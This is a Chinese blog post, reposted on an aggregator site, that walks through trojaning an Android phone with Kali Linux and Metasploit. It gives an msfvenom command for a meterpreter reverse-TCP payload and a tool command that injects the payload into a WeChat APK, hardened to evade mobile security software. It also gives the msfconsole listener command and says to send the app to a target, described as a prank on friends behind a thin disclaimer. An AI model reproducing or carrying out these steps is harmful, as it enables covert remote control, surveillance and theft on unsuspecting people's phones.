Kali Linux使用MSF木马入侵安卓手机

这篇具有很好参考价值的文章主要介绍了Kali Linux使用MSF木马入侵安卓手机。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

声明:

  1. 本文章仅做娱乐和学习,切勿非法使用!!
  2. 本人技术一般,水平有限,如有不对请多多指正。

一、环境准备

  1. Kali Linux
  2. 安卓手机一部(安卓11)

二、内网穿透

要想玩的好,总不能本地玩自己吧,也得和周边朋友开个玩笑吧,所以就得做内网穿透了,免费内网穿透可以看这位大佬的

CSDN博主「Lisa Cpolar」
我这边用的是自己frp拿自己服务器做了内网穿透
msf 马反编译,kali linux,linux,python

三、木马生成并加到apk

直接用msf生成的apk打开没有内容,安装报毒,且目前的安卓11以上无法直接安装,

msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> R > <文件名>.apk

网上大部分都是生成后对apk反编译加马,加签名等等,这边用这位大佬的python工具直接给apk加马,把msf生成的安卓远控附加进普通的app中,并进行加固隐藏特征。可以绕过常见的手机安全管家。
大佬GItHub
使安装python3, Java环境.
使用python3生成apk文件, 需要指定msf远控链接的IP和端口.(本地的填本地kali的IP,做了内网穿透填穿透后的公网地址和端口)

python main.py --lhost 192.168.0.106 --lport 1433  -n ../微信_7.0.22.apk

msf 马反编译,kali linux,linux,python

三、使用msfconsole加载handler.rc进行服务端监听

加马完成后会在WorkDir文件夹下生成一个handler.rc文件,做了内网穿透的把此文件里面的ip改为kali机的IP,端口改为做kali本地监听公网的那个端口**(注意和上面那个端口的区别)**
然后使用msfconsole加载handler.rc进行服务端监听

msfconsole -r WorkDir/handler.rc

msf 马反编译,kali linux,linux,python

四、将apk发给目标机安装

请勿违法违规!
msf 马反编译,kali linux,linux,python

五、结束

对方安装点击就会被监听到,help命令查看
msf 马反编译,kali linux,linux,python

六、问题

现在手机基本都控制着不给权限,比如我用一个音乐软件只有存储和音频权限,只能截图,获取安装的软件列表,打开软件之类的,要是想控制摄像头就不行,软件也会报错,现在问题就是没办法主动获取权限,只能由用户授权,而且大佬的加马工具也不是所有软件都能成功。
能力有限,水平一般,希望有办法的大佬们指点一下。文章来源地址https://www.toymoban.com/news/detail-820800.html

到了这里,关于Kali Linux使用MSF木马入侵安卓手机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • MSF生成木马及木马的简单使用

    本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。 由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM 环境配置说明 在kali虚拟机中使用 msfvenom 命令,查看kali中是否安装msfvenom模块

    2023年04月09日
    浏览(56)
  • 利用MSF打包加固APK对安卓手机进行控制

    由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。 相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标

    2024年01月16日
    浏览(42)
  • Kali Linux利用MSF渗透Windows11电脑

    目录 一、MSF简介 渗透环境 二、渗透流程 1.Kali Linux进入Root模式  2.生成可执行文件 3.运行msfconsole命令  4.配置参数  5.在靶机Windows11打开可执行文件 6.渗透 Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayloa

    2024年02月06日
    浏览(44)
  • kali安卓手机木马远控

    得到kali本机IP,设置端口 利用msf payload模块生成木马 命令: msfvenom -p android/meterpreter/reverse_tcp   lhost=192.168.174.129 lport=5555 R 1.apk 木马生成后 开启我们的监听模块msfconsole 进入控制端后,设置一个安卓的playload(之前使用过的)   设置监听kali虚拟机的ip地址和端口号(与之前生

    2024年02月13日
    浏览(45)
  • MSF生成后门木马

    前言 为了方便平时使用,记录一下操作命令 注意: lhost 为本地地址, rhost 为目标地址 1、👋Windows 生成连接木马 将木马放到目标服务器运行 使用模块连接我们的木马 2、👋Linux 使用 msfvenom 模块生成连接木马 x64生成64位的🐎 x86生成32位的🐎 elf 为可执行的二进制文件 若传

    2024年02月06日
    浏览(39)
  • msf渗透练习-生成木马控制window系统

    说明: 本章内容,仅供学习,不要用于非法用途(做个好白帽) (一)生成木马 命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.46 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5 -p:设置payload,也就是要生成的可执行文件的类型和功能,这里选择的是Windows Meterpreter反向

    2024年02月08日
    浏览(40)
  • 我的MSF之Android木马渗透的学习笔记

    免责声明:以下内容仅供学习参考,如果用于任何非法途径,后果自负,希望大家做一个遵纪守法的好公民,一起保护国家的的网络安全!!! 攻击机:kali 靶机:Android 1.木马制作 通过 msfvenom 制作安卓木马 2.开启http服务 在 kali 终端输入以下命令开启http服务 3.靶机下载木马

    2024年02月12日
    浏览(35)
  • 利用msf进行内网的木马渗透详细教程

    本文仅限学术交流,请勿用他人实践 本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10)  文章目录 前言 一 准备工作 二 进行渗透 1.开启服务:需要开启apache和postgresql服务 2.制作木马文件,利用msf进行渗透 总结  提示:以下是本篇文章正文内容,下

    2023年04月08日
    浏览(44)
  • 肥肠恐布--探索Kali Linux中的Metasploit Framework(MSF听说肾透大佬经常用)

    请注意,在使用Metasploit Framework进行渗透测试和漏洞利用时,务必遵守合法和授权的原则,此文仅供大家学习参考,请确保您获得了适当的授权,并遵守法律和合规性要求。非法使用和滥用导致严重的法律后果自负。 目录 前言 一、什么是Metasploit Framework(MSF)? 二、Metaspl

    2024年02月15日
    浏览(43)
  • 记一次MSF永恒之蓝入侵win7系统实验

      目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目标机cmd  5# meterpreter基础命令 攻击源ip:192.168.193.130     #系统:kali      镜像下载地址:点击跳转  靶 机  ip:192.168.19

    2024年02月13日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包